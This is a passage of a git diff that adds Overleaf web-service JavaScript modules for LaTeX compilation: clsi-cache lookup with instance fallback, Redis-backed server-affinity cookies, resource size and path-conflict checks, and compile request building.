`/build/${buildId}/search/output/${filename}` + return getRedirectWithFallback(projectId, userId, path, signal) +} + +/** + * Get an output file from the most recent build. + * + * @param projectId + * @param userId + * @param filename + * @param signal + * @return {Promise<{size: number, zone: string, location: string, lastModified: Date, allFiles: string[]}>} + */ +async function getLatestOutputFile( + projectId, + userId, + filename, + signal = AbortSignal.timeout(15_000) +) { + validateFilename(filename) + + let path = `/project/${projectId}` + if (userId) { + path += `/user/${userId}` + } + path += `/latest/output/${filename}` + return getRedirectWithFallback(projectId, userId, path, signal) +} + +/** + * Request the given path from any of the clsi-cache instances. + * + * Some of them might be down temporarily. Try the next one until we receive a redirect or 404. + * + * This function is similar to the Coordinator in the clsi-cache, notable differences: + * - all the logic for sorting builds is in clsi-cache (re-used by clsi and web) + * - fan-out (1 client performs lookup on many clsi-cache instances) is "central" in clsi-cache, resulting in better connection re-use + * - we only cross the k8s cluster boundary via an internal GCLB once ($$$) + * + * @param projectId + * @param userId + * @param path + * @param signal + * @return {Promise<{size: number, zone: string, location: string, lastModified: Date, allFiles: string[]}>} + */ +async function getRedirectWithFallback( + projectId, + userId, + path, + signal = AbortSignal.timeout(15_000) +) { + // Avoid hitting the same instance first all the time. + const instances = _.shuffle(Settings.apis.clsiCache.instances) + for (const { url, zone } of instances) { + const u = new URL(url) + u.pathname = path + try { + const { + location, + response: { headers }, + } = await fetchRedirectWithResponse(u, { + signal, + }) + // Success, return the cache entry. + return { + location, + zone: headers.get('X-Zone'), + lastModified: new Date(headers.get('X-Last-Modified')), + size: parseInt(headers.get('X-Content-Length'), 10), + allFiles: JSON.parse(headers.get('X-All-Files')), + } + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + break // No clsi-cache instance has cached something for this project/user. 
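+/*
+ * Sketch of the fallback strategy implemented above: instances are shuffled
+ * so no single clsi-cache node is always probed first, a 404 means no
+ * instance has the entry (stop), and any other failure means "this instance
+ * is down, try the next one". Shape of the loop with assumed helper names:
+ *
+ *   for (const instance of _.shuffle(instances)) {
+ *     try { return await fetchFrom(instance) }
+ *     catch (err) { if (isNotFound(err)) break } // otherwise try the next one
+ *   }
+ *   throw new NotFoundError('nothing cached yet')
+ */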
+ } + logger.warn( + { err, projectId, userId, url, zone }, + 'getLatestOutputFile from clsi-cache failed' + ) + // This clsi-cache instance is down, try the next backend. + } + } + throw new NotFoundError('nothing cached yet') +} + +/** + * Populate the clsi-cache for the given project/user with the provided source + * + * This is either another project, or a template (id+version). + * + * @param projectId + * @param userId + * @param sourceProjectId + * @param templateId + * @param templateVersionId + * @param lastUpdated + * @param zone + * @param signal + * @return {Promise<void>} + */ +async function prepareCacheSource( + projectId, + userId, + { sourceProjectId, templateId, templateVersionId, lastUpdated, zone, signal } +) { + const url = new URL( + `/project/${projectId}/user/${userId}/import-from`, + Settings.apis.clsiCache.instances.find(i => i.zone === zone).url + ) + try { + await fetchNothing(url, { + method: 'POST', + json: { + sourceProjectId, + lastUpdated, + templateId, + templateVersionId, + }, + signal, + }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new NotFoundError() + } + throw err + } +} + +module.exports = { + clearCache, + getOutputFile, + getLatestOutputFile, + prepareCacheSource, +} diff --git a/services/web/app/src/Features/Compile/ClsiCacheManager.js b/services/web/app/src/Features/Compile/ClsiCacheManager.js new file mode 100644 index 0000000..1090b9f --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiCacheManager.js @@ -0,0 +1,106 @@ +const { NotFoundError } = require('../Errors/Errors') +const ClsiCacheHandler = require('./ClsiCacheHandler') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') + +/** + * Get the most recent build and metadata + * + * Internal: internal metadata; External: fine to send to user as-is. + * + * @param projectId + * @param userId + * @param filename + * @param signal + * @return {Promise<{internal: {zone: string, location: string}, external: {isUpToDate: boolean, lastUpdated: Date, size: number, allFiles: string[]}}>} + */ +async function getLatestBuildFromCache(projectId, userId, filename, signal) { + const [ + { location, lastModified: lastCompiled, zone, size, allFiles }, + lastUpdatedInRedis, + { lastUpdated: lastUpdatedInMongo }, + ] = await Promise.all([ + ClsiCacheHandler.getLatestOutputFile(projectId, userId, filename, signal), + DocumentUpdaterHandler.promises.getProjectLastUpdatedAt(projectId), + ProjectGetter.promises.getProject(projectId, { lastUpdated: 1 }), + ]) + + const lastUpdated = + lastUpdatedInRedis > lastUpdatedInMongo + ? lastUpdatedInRedis + : lastUpdatedInMongo + const isUpToDate = lastCompiled >= lastUpdated + + return { + internal: { + location, + zone, + }, + external: { + isUpToDate, + lastUpdated, + size, + allFiles, + }, + } +} + +/** + * Collect metadata and prepare the clsi-cache for the given project. 
+ * + * @param projectId + * @param userId + * @param sourceProjectId + * @param templateId + * @param templateVersionId + * @return {Promise<void>} + */ +async function prepareClsiCache( + projectId, + userId, + { sourceProjectId, templateId, templateVersionId } +) { + const { variant } = await SplitTestHandler.promises.getAssignmentForUser( + userId, + 'copy-clsi-cache' + ) + if (variant !== 'enabled') return + const signal = AbortSignal.timeout(5_000) + let lastUpdated + let zone = 'b' // populate template data on zone b + if (sourceProjectId) { + try { + ;({ + internal: { zone }, + external: { lastUpdated }, + } = await getLatestBuildFromCache( + sourceProjectId, + userId, + 'output.tar.gz', + signal + )) + } catch (err) { + if (err instanceof NotFoundError) return // nothing cached yet + throw err + } + } + try { + await ClsiCacheHandler.prepareCacheSource(projectId, userId, { + sourceProjectId, + templateId, + templateVersionId, + zone, + lastUpdated, + signal, + }) + } catch (err) { + if (err instanceof NotFoundError) return // nothing cached yet/expired. + throw err + } +} + +module.exports = { + getLatestBuildFromCache, + prepareClsiCache, +} diff --git a/services/web/app/src/Features/Compile/ClsiCookieManager.js b/services/web/app/src/Features/Compile/ClsiCookieManager.js new file mode 100644 index 0000000..fc542fe --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiCookieManager.js @@ -0,0 +1,250 @@ +const { URL, URLSearchParams } = require('url') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const request = require('request').defaults({ timeout: 30 * 1000 }) +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const Cookie = require('cookie') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const { promisifyAll } = require('@overleaf/promise-utils') + +const clsiCookiesEnabled = (Settings.clsiCookie?.key ?? 
'') !== '' + +const rclient = RedisWrapper.client('clsi_cookie') +let rclientSecondary +if (Settings.redis.clsi_cookie_secondary != null) { + rclientSecondary = RedisWrapper.client('clsi_cookie_secondary') +} + +module.exports = function (backendGroup) { + const cookieManager = { + buildKey(projectId, userId) { + if (backendGroup != null) { + return `clsiserver:${backendGroup}:${projectId}:${userId}` + } else { + return `clsiserver:${projectId}:${userId}` + } + }, + + getServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + callback + ) { + if (!clsiCookiesEnabled) { + return callback() + } + rclient.get(this.buildKey(projectId, userId), (err, serverId) => { + if (err) { + return callback(err) + } + if (serverId == null || serverId === '') { + this._populateServerIdViaRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + callback + ) + } else { + callback(null, serverId) + } + }) + }, + + _populateServerIdViaRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + callback + ) { + const u = new URL(`${Settings.apis.clsi.url}/project/${projectId}/status`) + u.search = new URLSearchParams({ + compileGroup, + compileBackendClass, + }).toString() + request.post(u.href, (err, res, body) => { + if (err) { + OError.tag(err, 'error getting initial server id for project', { + project_id: projectId, + }) + return callback(err) + } + if (!clsiCookiesEnabled) { + return callback() + } + const serverId = this._parseServerIdFromResponse(res) + this.setServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + serverId, + null, + function (err) { + if (err) { + logger.warn( + { err, projectId }, + 'error setting server id via populate request' + ) + } + callback(err, serverId) + } + ) + }) + }, + + _parseServerIdFromResponse(response) { + const cookies = Cookie.parse(response.headers['set-cookie']?.[0] || '') + return cookies?.[Settings.clsiCookie.key] + }, + + checkIsLoadSheddingEvent(clsiserverid, compileGroup, compileBackendClass) { + request.get( + { + url: `${Settings.apis.clsi.url}/instance-state`, + qs: { clsiserverid, compileGroup, compileBackendClass }, + }, + (err, res, body) => { + if (err) { + Metrics.inc('clsi-lb-switch-backend', 1, { + status: 'error', + }) + logger.warn({ err, clsiserverid }, 'cannot probe clsi VM') + return + } + const isStillRunning = + res.statusCode === 200 && body === `${clsiserverid},UP\n` + Metrics.inc('clsi-lb-switch-backend', 1, { + status: isStillRunning ? 'load-shedding' : 'cycle', + }) + } + ) + }, + + _getTTLInSeconds(clsiServerId) { + return (clsiServerId || '').includes('-reg-') + ? Settings.clsiCookie.ttlInSecondsRegular + : Settings.clsiCookie.ttlInSeconds + }, + + setServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + serverId, + previous, + callback + ) { + if (!clsiCookiesEnabled) { + return callback() + } + if (serverId == null) { + // We don't get a cookie back if it hasn't changed + return rclient.expire( + this.buildKey(projectId, userId), + this._getTTLInSeconds(previous), + err => callback(err) + ) + } + if (!previous) { + // Initial assignment of a user+project or after clearing cache. 
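+/*
+ * Sketch of the TTL rule in _getTTLInSeconds above: server ids containing
+ * '-reg-' (regular clsi VMs) get the longer TTL, everything else the default.
+ * The ids below are made up for illustration:
+ *
+ *   _getTTLInSeconds('clsi-reg-abc1') // Settings.clsiCookie.ttlInSecondsRegular
+ *   _getTTLInSeconds('clsi-prem-xyz') // Settings.clsiCookie.ttlInSeconds
+ */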
+ Metrics.inc('clsi-lb-assign-initial-backend') + } else { + this.checkIsLoadSheddingEvent( + previous, + compileGroup, + compileBackendClass + ) + } + if (rclientSecondary != null) { + this._setServerIdInRedis( + rclientSecondary, + projectId, + userId, + serverId, + () => {} + ) + } + this._setServerIdInRedis(rclient, projectId, userId, serverId, err => + callback(err) + ) + }, + + _setServerIdInRedis(rclient, projectId, userId, serverId, callback) { + rclient.setex( + this.buildKey(projectId, userId), + this._getTTLInSeconds(serverId), + serverId, + callback + ) + }, + + clearServerId(projectId, userId, callback) { + if (!clsiCookiesEnabled) { + return callback() + } + rclient.del(this.buildKey(projectId, userId), err => { + if (err) { + // redis errors need wrapping as the instance may be shared + return callback( + new OError( + 'Failed to clear clsi persistence', + { projectId, userId }, + err + ) + ) + } else { + return callback() + } + }) + }, + + getCookieJar( + projectId, + userId, + compileGroup, + compileBackendClass, + callback + ) { + if (!clsiCookiesEnabled) { + return callback(null, request.jar(), undefined) + } + this.getServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + (err, serverId) => { + if (err != null) { + OError.tag(err, 'error getting server id', { + project_id: projectId, + }) + return callback(err) + } + const serverCookie = request.cookie( + `${Settings.clsiCookie.key}=${serverId}` + ) + const jar = request.jar() + jar.setCookie(serverCookie, Settings.apis.clsi.url) + callback(null, jar, serverId) + } + ) + }, + } + cookieManager.promises = promisifyAll(cookieManager, { + without: [ + '_parseServerIdFromResponse', + 'checkIsLoadSheddingEvent', + '_getTTLInSeconds', + ], + multiResult: { + getCookieJar: ['jar', 'clsiServerId'], + }, + }) + return cookieManager +} diff --git a/services/web/app/src/Features/Compile/ClsiFormatChecker.js b/services/web/app/src/Features/Compile/ClsiFormatChecker.js new file mode 100644 index 0000000..1828f2f --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiFormatChecker.js @@ -0,0 +1,89 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
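+/*
+ * Usage sketch for the promisified ClsiCookieManager above: the multiResult
+ * option maps getCookieJar's (jar, clsiServerId) callback arguments onto an
+ * object, so callers consume it as (hypothetical call site):
+ *
+ *   const { jar, clsiServerId } = await cookieManager.promises.getCookieJar(
+ *     projectId, userId, compileGroup, compileBackendClass
+ *   )
+ */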
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ClsiFormatChecker +const _ = require('lodash') +const async = require('async') +const settings = require('@overleaf/settings') +const { promisifyAll } = require('@overleaf/promise-utils') + +module.exports = ClsiFormatChecker = { + checkRecoursesForProblems(resources, callback) { + const jobs = { + conflictedPaths(cb) { + return ClsiFormatChecker._checkForConflictingPaths(resources, cb) + }, + + sizeCheck(cb) { + return ClsiFormatChecker._checkDocsAreUnderSizeLimit(resources, cb) + }, + } + + return async.series(jobs, function (err, problems) { + if (err != null) { + return callback(err) + } + + problems = _.omitBy(problems, _.isEmpty) + + if (_.isEmpty(problems)) { + return callback() + } else { + return callback(null, problems) + } + }) + }, + + _checkForConflictingPaths(resources, callback) { + const paths = resources.map(resource => resource.path) + + const conflicts = _.filter(paths, function (path) { + const matchingPaths = _.filter( + paths, + checkPath => checkPath.indexOf(path + '/') !== -1 + ) + + return matchingPaths.length > 0 + }) + + const conflictObjects = conflicts.map(conflict => ({ path: conflict })) + + return callback(null, conflictObjects) + }, + + _checkDocsAreUnderSizeLimit(resources, callback) { + const sizeLimit = 1000 * 1000 * settings.compileBodySizeLimitMb + + let totalSize = 0 + + let sizedResources = resources.map(function (resource) { + const result = { path: resource.path } + if (resource.content != null) { + result.size = resource.content.replace(/\n/g, '').length + result.kbSize = Math.ceil(result.size / 1000) + } else { + result.size = 0 + } + totalSize += result.size + return result + }) + + const tooLarge = totalSize > sizeLimit + if (!tooLarge) { + return callback() + } else { + sizedResources = _.sortBy(sizedResources, 'size').reverse().slice(0, 10) + return callback(null, { resources: sizedResources, totalSize }) + } + }, +} + +module.exports.promises = promisifyAll(module.exports) diff --git a/services/web/app/src/Features/Compile/ClsiManager.js b/services/web/app/src/Features/Compile/ClsiManager.js new file mode 100644 index 0000000..021f102 --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiManager.js @@ -0,0 +1,873 @@ +const { callbackify } = require('util') +const { callbackifyMultiResult } = require('@overleaf/promise-utils') +const { + fetchString, + fetchStringWithResponse, + fetchStream, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const Settings = require('@overleaf/settings') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { Cookie } = require('tough-cookie') +const ClsiCookieManager = require('./ClsiCookieManager')( + Settings.apis.clsi?.backendGroupName +) +const Features = require('../../infrastructure/Features') +const NewBackendCloudClsiCookieManager = require('./ClsiCookieManager')( + Settings.apis.clsi_new?.backendGroupName +) +const ClsiStateManager = require('./ClsiStateManager') +const _ = require('lodash') +const ClsiFormatChecker = require('./ClsiFormatChecker') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const Metrics = 
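+/*
+ * Example of the path-conflict check in ClsiFormatChecker above: a resource
+ * path conflicts when another path treats it as a directory. With the made-up
+ * paths ['main.tex', 'figures', 'figures/plot.pdf'], 'figures' is flagged
+ * because 'figures/plot.pdf' contains 'figures/':
+ *
+ *   _checkForConflictingPaths(resources, cb) // cb(null, [{ path: 'figures' }])
+ */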
require('@overleaf/metrics') +const Errors = require('../Errors/Errors') +const ClsiCacheHandler = require('./ClsiCacheHandler') +const { getBlobLocation } = require('../History/HistoryManager') + +const VALID_COMPILERS = ['pdflatex', 'latex', 'xelatex', 'lualatex'] +const OUTPUT_FILE_TIMEOUT_MS = 60000 +const CLSI_COOKIES_ENABLED = (Settings.clsiCookie?.key ?? '') !== '' + +// The timeout in services/clsi/app.js is 10 minutes, so we'll be on the safe side with 12 minutes +const COMPILE_REQUEST_TIMEOUT_MS = 12 * 60 * 1000 + +function collectMetricsOnBlgFiles(outputFiles) { + let topLevel = 0 + let nested = 0 + for (const outputFile of outputFiles) { + if (outputFile.type === 'blg') { + if (outputFile.path.includes('/')) { + nested++ + } else { + topLevel++ + } + } + } + Metrics.count('blg_output_file', topLevel, 1, { path: 'top-level' }) + Metrics.count('blg_output_file', nested, 1, { path: 'nested' }) +} + +async function sendRequest(projectId, userId, options) { + if (options == null) { + options = {} + } + let result = await sendRequestOnce(projectId, userId, options) + if (result.status === 'conflict') { + // Try again, with a full compile + result = await sendRequestOnce(projectId, userId, { + ...options, + syncType: 'full', + }) + } else if (result.status === 'unavailable') { + result = await sendRequestOnce(projectId, userId, { + ...options, + syncType: 'full', + forceNewClsiServer: true, + }) + } + return result +} + +async function sendRequestOnce(projectId, userId, options) { + let req + try { + req = await _buildRequest(projectId, options) + } catch (err) { + if (err.message === 'no main file specified') { + return { + status: 'validation-problems', + validationProblems: { mainFile: err.message }, + } + } else { + throw OError.tag(err, 'Could not build request to CLSI', { + projectId, + options, + }) + } + } + return await _sendBuiltRequest(projectId, userId, req, options) +} + +// for public API requests where there is no project id +async function sendExternalRequest(submissionId, clsiRequest, options) { + if (options == null) { + options = {} + } + return await _sendBuiltRequest(submissionId, null, clsiRequest, options) +} + +async function stopCompile(projectId, userId, options) { + if (options == null) { + options = {} + } + const { compileBackendClass, compileGroup } = options + const url = _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId, + 'compile/stop' + ) + const opts = { method: 'POST' } + await _makeRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts + ) +} + +async function deleteAuxFiles(projectId, userId, options, clsiserverid) { + if (options == null) { + options = {} + } + const { compileBackendClass, compileGroup } = options + const url = _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId + ) + const opts = { + method: 'DELETE', + } + + try { + await _makeRequestWithClsiServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts, + clsiserverid + ) + } finally { + // always clear the clsi-cache + try { + await ClsiCacheHandler.clearCache(projectId, userId) + } catch (err) { + logger.warn({ err, projectId, userId }, 'purge clsi-cache failed') + } + + // always clear the project state from the docupdater, even if there + // was a problem with the request to the clsi + try { + await DocumentUpdaterHandler.promises.clearProjectState(projectId) + } finally { + await ClsiCookieManager.promises.clearServerId(projectId, userId) + } + } +} + +async 
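+/*
+ * Sketch of the retry policy in sendRequest above: a 'conflict' result is
+ * retried once as a full (non-incremental) compile, and 'unavailable' is
+ * retried once as a full compile forced onto a fresh clsi server:
+ *
+ *   let result = await sendRequestOnce(projectId, userId, options)
+ *   if (result.status === 'conflict') {
+ *     result = await sendRequestOnce(projectId, userId, { ...options, syncType: 'full' })
+ *   } else if (result.status === 'unavailable') {
+ *     result = await sendRequestOnce(projectId, userId, {
+ *       ...options, syncType: 'full', forceNewClsiServer: true,
+ *     })
+ *   }
+ */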
function _sendBuiltRequest(projectId, userId, req, options, callback) { + if (options.forceNewClsiServer) { + await ClsiCookieManager.promises.clearServerId(projectId, userId) + } + const validationProblems = + await ClsiFormatChecker.promises.checkRecoursesForProblems( + req.compile?.resources + ) + if (validationProblems != null) { + logger.debug( + { projectId, validationProblems }, + 'problems with users latex before compile was attempted' + ) + return { + status: 'validation-problems', + validationProblems, + } + } + + const { response, clsiServerId } = await _postToClsi( + projectId, + userId, + req, + options.compileBackendClass, + options.compileGroup + ) + + const outputFiles = _parseOutputFiles( + projectId, + response && response.compile && response.compile.outputFiles + ) + collectMetricsOnBlgFiles(outputFiles) + const compile = response?.compile || {} + return { + status: compile.status, + outputFiles, + clsiServerId, + buildId: compile.buildId, + stats: compile.stats, + timings: compile.timings, + outputUrlPrefix: compile.outputUrlPrefix, + } +} + +async function _makeRequestWithClsiServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts, + clsiserverid +) { + if (clsiserverid) { + // ignore cookies and newBackend, go straight to the clsi node + url.searchParams.set('compileGroup', compileGroup) + url.searchParams.set('compileBackendClass', compileBackendClass) + url.searchParams.set('clsiserverid', clsiserverid) + + let body + try { + body = await fetchString(url, opts) + } catch (err) { + throw OError.tag(err, 'error making request to CLSI', { + userId, + projectId, + }) + } + + let json + try { + json = JSON.parse(body) + } catch (err) { + // some responses are empty. Ignore JSON parsing errors. + } + + return { body: json } + } else { + return await _makeRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts + ) + } +} + +async function _makeRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts +) { + const currentBackendStartTime = new Date() + const clsiServerId = await ClsiCookieManager.promises.getServerId( + projectId, + userId, + compileGroup, + compileBackendClass + ) + opts.headers = { + Accept: 'application/json', + 'Content-Type': 'application/json', + } + + if (CLSI_COOKIES_ENABLED) { + const cookie = new Cookie({ + key: Settings.clsiCookie.key, + value: clsiServerId, + }) + opts.headers.Cookie = cookie.cookieString() + } + + const timer = new Metrics.Timer('compile.currentBackend') + + let response, body + try { + ;({ body, response } = await fetchStringWithResponse(url, opts)) + } catch (err) { + throw OError.tag(err, 'error making request to CLSI', { + projectId, + userId, + }) + } + + Metrics.inc(`compile.currentBackend.response.${response.status}`) + + let json + try { + json = JSON.parse(body) + } catch (err) { + // some responses are empty. 
Ignore JSON parsing errors + } + + timer.done() + let newClsiServerId + if (CLSI_COOKIES_ENABLED) { + newClsiServerId = _getClsiServerIdFromResponse(response) + await ClsiCookieManager.promises.setServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + newClsiServerId, + clsiServerId + ) + } + const currentCompileTime = new Date() - currentBackendStartTime + + // Start new backend request in the background + const newBackendStartTime = new Date() + _makeNewBackendRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts + ) + .then(result => { + if (result == null) { + return + } + const { response: newBackendResponse } = result + Metrics.inc(`compile.newBackend.response.${newBackendResponse.status}`) + const newBackendCompileTime = new Date() - newBackendStartTime + const currentStatusCode = response.status + const newStatusCode = newBackendResponse.status + const statusCodeSame = newStatusCode === currentStatusCode + const timeDifference = newBackendCompileTime - currentCompileTime + logger.debug( + { + statusCodeSame, + timeDifference, + currentCompileTime, + newBackendCompileTime, + projectId, + }, + 'both clsi requests returned' + ) + }) + .catch(err => { + logger.warn({ err }, 'Error making request to new CLSI backend') + }) + + return { + body: json, + clsiServerId: newClsiServerId || clsiServerId, + } +} + +async function _makeNewBackendRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts +) { + if (Settings.apis.clsi_new?.url == null) { + return null + } + url = url + .toString() + .replace(Settings.apis.clsi.url, Settings.apis.clsi_new.url) + + const clsiServerId = + await NewBackendCloudClsiCookieManager.promises.getServerId( + projectId, + userId, + compileGroup, + compileBackendClass + ) + opts.headers = { + Accept: 'application/json', + 'Content-Type': 'application/json', + } + + if (CLSI_COOKIES_ENABLED) { + const cookie = new Cookie({ + key: Settings.clsiCookie.key, + value: clsiServerId, + }) + opts.headers.Cookie = cookie.cookieString() + } + + const timer = new Metrics.Timer('compile.newBackend') + + let response, body + try { + ;({ body, response } = await fetchStringWithResponse(url, opts)) + } catch (err) { + throw OError.tag(err, 'error making request to new CLSI', { + userId, + projectId, + }) + } + + let json + try { + json = JSON.parse(body) + } catch (err) { + // Some responses are empty. 
Ignore JSON parsing errors + } + timer.done() + if (CLSI_COOKIES_ENABLED) { + const newClsiServerId = _getClsiServerIdFromResponse(response) + await NewBackendCloudClsiCookieManager.promises.setServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + newClsiServerId, + clsiServerId + ) + } + return { response, body: json } +} + +function _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId, + action +) { + const u = new URL(`/project/${projectId}`, Settings.apis.clsi.url) + if (userId != null) { + u.pathname += `/user/${userId}` + } + if (action != null) { + u.pathname += `/${action}` + } + u.searchParams.set('compileBackendClass', compileBackendClass) + u.searchParams.set('compileGroup', compileGroup) + return u +} + +async function _postToClsi( + projectId, + userId, + req, + compileBackendClass, + compileGroup +) { + const url = _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId, + 'compile' + ) + const opts = { + json: req, + method: 'POST', + signal: AbortSignal.timeout(COMPILE_REQUEST_TIMEOUT_MS), + } + try { + const { body, clsiServerId } = await _makeRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts + ) + return { response: body, clsiServerId } + } catch (err) { + if (err instanceof RequestFailedError) { + if (err.response.status === 413) { + return { response: { compile: { status: 'project-too-large' } } } + } else if (err.response.status === 409) { + return { response: { compile: { status: 'conflict' } } } + } else if (err.response.status === 423) { + return { response: { compile: { status: 'compile-in-progress' } } } + } else if (err.response.status === 503) { + return { response: { compile: { status: 'unavailable' } } } + } else { + throw new OError( + `CLSI returned non-success code: ${err.response.status}`, + { + projectId, + userId, + compileOptions: req.compile.options, + rootResourcePath: req.compile.rootResourcePath, + clsiResponse: err.body, + statusCode: err.response.status, + } + ) + } + } else { + throw new OError( + 'failed to make request to CLSI', + { + projectId, + userId, + compileOptions: req.compile.options, + rootResourcePath: req.compile.rootResourcePath, + }, + err + ) + } + } +} + +function _parseOutputFiles(projectId, rawOutputFiles = []) { + const outputFiles = [] + for (const file of rawOutputFiles) { + const f = { + path: file.path, // the clsi is now sending this to web + url: new URL(file.url).pathname, // the location of the file on the clsi, excluding the host part + type: file.type, + build: file.build, + } + if (file.path === 'output.pdf') { + f.contentId = file.contentId + f.ranges = file.ranges || [] + f.size = file.size + f.startXRefTable = file.startXRefTable + f.createdAt = new Date() + } + outputFiles.push(f) + } + return outputFiles +} + +async function _buildRequest(projectId, options) { + const project = await ProjectGetter.promises.getProject(projectId, { + compiler: 1, + rootDoc_id: 1, + imageName: 1, + rootFolder: 1, + 'overleaf.history.id': 1, + }) + if (project == null) { + throw new Errors.NotFoundError(`project does not exist: ${projectId}`) + } + if (!VALID_COMPILERS.includes(project.compiler)) { + project.compiler = 'pdflatex' + } + + if (options.incrementalCompilesEnabled || options.syncType != null) { + // new way, either incremental or full + const timer = new Metrics.Timer('editor.compile-getdocs-redis') + let projectStateHash, docUpdaterDocs + try { + ;({ projectStateHash, docs: docUpdaterDocs } = + await 
getContentFromDocUpdaterIfMatch(projectId, project, options)) + } catch (err) { + logger.error({ err, projectId }, 'error checking project state') + // note: we don't bail out when there's an error getting + // incremental files from the docupdater, we just fall back + // to a normal compile below + } + timer.done() + // see if we can send an incremental update to the CLSI + if (docUpdaterDocs != null && options.syncType !== 'full') { + Metrics.inc('compile-from-redis') + return _buildRequestFromDocupdater( + projectId, + options, + project, + projectStateHash, + docUpdaterDocs + ) + } else { + Metrics.inc('compile-from-mongo') + return await _buildRequestFromMongo( + projectId, + options, + project, + projectStateHash + ) + } + } else { + // old way, always from mongo + const timer = new Metrics.Timer('editor.compile-getdocs-mongo') + const { docs, files } = await _getContentFromMongo(projectId) + timer.done() + return _finaliseRequest(projectId, options, project, docs, files) + } +} + +async function getContentFromDocUpdaterIfMatch(projectId, project, options) { + const projectStateHash = ClsiStateManager.computeHash(project, options) + const docs = await DocumentUpdaterHandler.promises.getProjectDocsIfMatch( + projectId, + projectStateHash + ) + return { projectStateHash, docs } +} + +async function getOutputFileStream( + projectId, + userId, + options, + clsiServerId, + buildId, + outputFilePath +) { + const { compileBackendClass, compileGroup } = options + const url = new URL( + `${Settings.apis.clsi.url}/project/${projectId}/user/${userId}/build/${buildId}/output/${outputFilePath}` + ) + url.searchParams.set('compileBackendClass', compileBackendClass) + url.searchParams.set('compileGroup', compileGroup) + url.searchParams.set('clsiserverid', clsiServerId) + try { + const stream = await fetchStream(url, { + signal: AbortSignal.timeout(OUTPUT_FILE_TIMEOUT_MS), + }) + return stream + } catch (err) { + throw new Errors.OutputFileFetchFailedError( + 'failed to fetch output file from CLSI', + { + projectId, + userId, + url, + status: err.response?.status, + } + ) + } +} + +function _buildRequestFromDocupdater( + projectId, + options, + project, + projectStateHash, + docUpdaterDocs +) { + const docPath = ProjectEntityHandler.getAllDocPathsFromProject(project) + const docs = {} + for (const doc of docUpdaterDocs || []) { + const path = docPath[doc._id] + docs[path] = doc + } + // send new docs but not files as those are already on the clsi + options = _.clone(options) + options.syncType = 'incremental' + options.syncState = projectStateHash + // create stub doc entries for any possible root docs, if not + // present in the docupdater. This allows finaliseRequest to + // identify the root doc. 
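+  // For illustration (hypothetical values): if the root doc is main.tex and
+  // it has no pending edits in redis, a stub of the form
+  //   docs['main.tex'] = { _id: rootDocId, path: 'main.tex' }
+  // is added, so that _finaliseRequest can still resolve rootResourcePath.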
+ const possibleRootDocIds = [options.rootDoc_id, project.rootDoc_id] + for (const rootDocId of possibleRootDocIds) { + if (rootDocId != null && rootDocId in docPath) { + const path = docPath[rootDocId] + if (docs[path] == null) { + docs[path] = { _id: rootDocId, path } + } + } + } + return _finaliseRequest(projectId, options, project, docs, []) +} + +async function _buildRequestFromMongo( + projectId, + options, + project, + projectStateHash +) { + const { docs, files } = await _getContentFromMongo(projectId) + options = { + ...options, + syncType: 'full', + syncState: projectStateHash, + } + return _finaliseRequest(projectId, options, project, docs, files) +} + +async function _getContentFromMongo(projectId) { + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + const docs = await ProjectEntityHandler.promises.getAllDocs(projectId) + const files = await ProjectEntityHandler.promises.getAllFiles(projectId) + return { docs, files } +} + +function _finaliseRequest(projectId, options, project, docs, files) { + const resources = [] + let flags + let rootResourcePath = null + let rootResourcePathOverride = null + let hasMainFile = false + let numberOfDocsInProject = 0 + + for (let path in docs) { + const doc = docs[path] + path = path.replace(/^\//, '') // Remove leading / + numberOfDocsInProject++ + if (doc.lines != null) { + // add doc to resources unless it is just a stub entry + resources.push({ + path, + content: doc.lines.join('\n'), + }) + } + if ( + project.rootDoc_id != null && + doc._id.toString() === project.rootDoc_id.toString() + ) { + rootResourcePath = path + } + if ( + options.rootDoc_id != null && + doc._id.toString() === options.rootDoc_id.toString() + ) { + rootResourcePathOverride = path + } + if (path === 'main.tex') { + hasMainFile = true + } + } + + if (rootResourcePathOverride != null) { + rootResourcePath = rootResourcePathOverride + } + if (rootResourcePath == null) { + if 